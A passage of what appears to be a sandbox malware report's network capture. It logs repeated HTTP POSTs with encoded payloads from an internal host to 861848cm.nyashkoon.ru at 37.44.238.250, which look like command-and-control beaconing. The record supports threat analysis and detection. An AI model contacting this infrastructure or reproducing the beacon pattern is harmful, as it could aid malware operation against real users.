                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            114192.168.2.45012137.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:14.296658993 CET309OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:54:14.649203062 CET1024OUTData Raw: 53 56 5f 58 53 5f 55 59 5a 5f 52 51 54 58 5b 59 55 52 59 5f 51 56 52 5d 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SV_XS_UYZ_RQTX[YURY_QVR]TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%;.+?0<]=9!Y=>:[$7#/>W<(:; Q=2)'X$.Q-.
                                                                                            Nov 5, 2024 23:54:15.110356092 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:15.180246115 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:13 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            115192.168.2.45012237.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:15.308584929 CET309OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:54:15.664985895 CET1024OUTData Raw: 53 54 5f 5e 56 5c 50 53 5a 5f 52 51 54 5f 5b 5a 55 57 59 59 51 53 52 59 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: ST_^V\PSZ_RQT_[ZUWYYQSRYTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%^;<1<+<>04)6>.*'([4T?>.%;7:&'X$.Q-2
                                                                                            Nov 5, 2024 23:54:16.130914927 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:16.209439039 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:14 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            116192.168.2.45012337.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:16.342113972 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:16.696072102 CET1024OUTData Raw: 53 56 5f 59 56 57 55 5d 5a 5f 52 51 54 5f 5b 53 55 51 59 5e 51 54 52 5d 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SV_YVWU]Z_RQT_[SUQY^QTR]TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%;?=+;? ]*:Y*-%+4["?([-63 $=%9'X$.Q-2
                                                                                            Nov 5, 2024 23:54:17.159926891 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:17.238702059 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:15 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            117192.168.2.45012437.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:17.369514942 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:17.727329016 CET1024OUTData Raw: 56 5f 5a 5d 56 5b 50 5c 5a 5f 52 51 54 58 5b 52 55 5c 59 5b 51 5e 52 5b 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: V_Z]V[P\Z_RQTX[RU\Y[Q^R[TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%/,=<>3+>:"==_38<Y +X(.<\77"\'9'X$.Q-.
                                                                                            Nov 5, 2024 23:54:18.173288107 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:18.249480009 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:16 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            118192.168.2.45012537.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:18.378263950 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:18.727356911 CET1024OUTData Raw: 56 53 5a 5a 56 5a 50 5a 5a 5f 52 51 54 53 5b 59 55 50 59 5e 51 57 52 52 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VSZZVZPZZ_RQTS[YUPY^QWRRTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%/V?7>#7))Z)6^'/7")=,95+!7&^%'X$.Q-


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            119192.168.2.45012737.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:19.150240898 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:19.508591890 CET1024OUTData Raw: 56 50 5a 58 56 5b 50 53 5a 5f 52 51 54 5b 5b 5d 55 5c 59 5f 51 57 52 59 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VPZXV[PSZ_RQT[[]U\Y_QWRYTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%,=+#<0X(:=9$( /)+095?4$=29'X$.Q-"
                                                                                            Nov 5, 2024 23:54:19.964268923 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:20.032934904 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:17 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            120192.168.2.45012637.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:19.150259018 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1260
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:19.508591890 CET1260OUTData Raw: 56 55 5a 54 53 5d 50 58 5a 5f 52 51 54 5a 5b 5a 55 53 59 56 51 54 52 5b 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VUZTS]PXZ_RQTZ[ZUSYVQTR[TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%_8.W<<\?0#)*"?-9'4?>W<.Z.50 72'X$.Q-
                                                                                            Nov 5, 2024 23:54:19.964112043 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:20.045540094 CET308INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:17 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 00 1e 23 06 3c 5c 36 1c 24 2b 20 54 29 58 3e 03 28 09 3c 02 38 0c 2b 07 3d 33 0e 5a 29 38 2c 19 37 3f 20 01 23 21 2e 04 20 0b 30 02 3c 3b 21 5f 05 1d 39 11 27 00 3c 1f 29 1c 00 5e 29 19 23 19 26 30 06 08 3e 3b 0b 02 37 2a 3a 54 25 2e 31 59 25 31 33 1b 3c 0a 0f 15 2c 2f 23 57 32 3a 2a 57 09 16 23 08 25 33 28 07 3d 22 3b 1d 27 2d 3e 00 26 2a 01 1c 3f 3c 20 02 20 34 3a 15 29 55 23 58 35 19 26 59 33 03 3e 08 24 3e 37 50 28 08 26 55 22 0d 20 54 01 30 5d 4f
                                                                                            Data Ascii: #<\6$+ T)X>(<8+=3Z)8,7? #!. 0<;!_9'<)^)#&0>;7*:T%.1Y%13<,/#W2:*W#%3(=";'->&*?< 4:)U#X5&Y3>$>7P(&U" T0]O


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            121192.168.2.45012837.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:20.162725925 CET309OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:54:20.508552074 CET1024OUTData Raw: 56 52 5f 59 53 5b 50 5a 5a 5f 52 51 54 5e 5b 53 55 52 59 5a 51 52 52 5d 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VR_YS[PZZ_RQT^[SURYZQRR]TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&;Y*V?8;(U \):>50(^#?"U+>3968X!71%9'X$.Q-6
                                                                                            Nov 5, 2024 23:54:20.985436916 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:21.056068897 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:18 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            122192.168.2.45012937.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:21.183181047 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:21.539843082 CET1024OUTData Raw: 56 57 5f 59 53 5a 50 5b 5a 5f 52 51 54 52 5b 58 55 5d 59 5e 51 52 52 5f 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VW_YSZP[Z_RQTR[XU]Y^QRR_TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%\,<"<0Y<4==^?-=$;4^7/=).:< Q:%'X$.Q-
                                                                                            Nov 5, 2024 23:54:21.994848013 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:22.071748018 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:20 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            123192.168.2.45013037.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:22.206775904 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:22.555428028 CET1024OUTData Raw: 53 52 5f 59 56 5d 55 59 5a 5f 52 51 54 58 5b 5f 55 55 59 5e 51 57 52 5a 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SR_YV]UYZ_RQTX[_UUY^QWRZTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&/,6W(?#$X>9"?-"';([4*Q<>7-&3 $.\%'X$.Q-.
                                                                                            Nov 5, 2024 23:54:23.017273903 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:23.094762087 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:21 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            124192.168.2.45013137.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:23.214060068 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:23.571095943 CET1024OUTData Raw: 53 54 5f 5c 56 5b 55 5a 5a 5f 52 51 54 53 5b 5a 55 53 59 58 51 53 52 52 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: ST_\V[UZZ_RQTS[ZUSYXQSRRTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%-?><^7+=>>.5';4?%?>3Y:42%9'X$.Q-
                                                                                            Nov 5, 2024 23:54:24.019639015 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:24.090620995 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:22 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            125192.168.2.45013237.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:24.229290962 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:24.586683989 CET1024OUTData Raw: 53 55 5a 59 53 5a 50 5d 5a 5f 52 51 54 53 5b 59 55 52 59 5b 51 5f 52 5e 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SUZYSZP]Z_RQTS[YURY[Q_R^TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%]8!+8#>33):-_?.&'##/<.0.50 '.^1'X$.Q-
                                                                                            Nov 5, 2024 23:54:25.043416023 CET25INHTTP/1.1 100 Continue


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            126192.168.2.45013337.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:25.061744928 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1284
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:25.417968035 CET1284OUTData Raw: 53 53 5a 5a 53 5f 55 59 5a 5f 52 51 54 5f 5b 59 55 5d 59 59 51 57 52 5c 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SSZZS_UYZ_RQT_[YU]YYQWR\TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&8(<34\=>6$8X4Q+X#Z96<7&X29'X$.Q-2
                                                                                            Nov 5, 2024 23:54:25.873442888 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:25.948654890 CET308INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:23 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 00 1e 23 04 3f 04 00 5f 30 3b 06 50 3e 10 2e 01 3f 30 3b 14 2c 22 38 5b 28 20 38 5c 3d 16 0e 51 22 2c 20 05 36 0c 2d 13 23 54 27 58 29 2b 21 5f 05 1d 39 12 33 29 34 50 3e 32 36 58 3e 34 23 1b 26 09 3c 06 3e 38 2a 5c 34 39 26 1e 25 07 2e 03 25 32 27 19 2b 27 29 15 3a 3c 23 1d 27 3a 2a 57 09 16 20 12 30 33 01 5b 3e 1f 20 06 24 3e 36 02 26 3a 23 57 3d 3c 09 5c 34 1d 22 58 29 30 27 5a 22 37 0c 13 27 3a 0f 1c 32 3d 37 1b 2b 18 26 55 22 0d 20 54 01 30 5d 4f
                                                                                            Data Ascii: #?_0;P>.?0;,"8[( 8\=Q", 6-#T'X)+!_93)4P>26X>4#&<>8*\49&%.%2'+'):<#':*W 03[> $>6&:#W=<\4"X)0'Z"7':2=7+&U" T0]O


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            127192.168.2.45013437.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:25.186127901 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:25.539814949 CET1024OUTData Raw: 56 53 5a 5a 56 5f 50 5b 5a 5f 52 51 54 5f 5b 5e 55 52 59 57 51 54 52 59 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VSZZV_P[Z_RQT_[^URYWQTRYTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&/Y!?<^<$Y*:5=!$ 9).[9' ')1'X$.Q-2
                                                                                            Nov 5, 2024 23:54:26.006628036 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:26.084197044 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:24 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
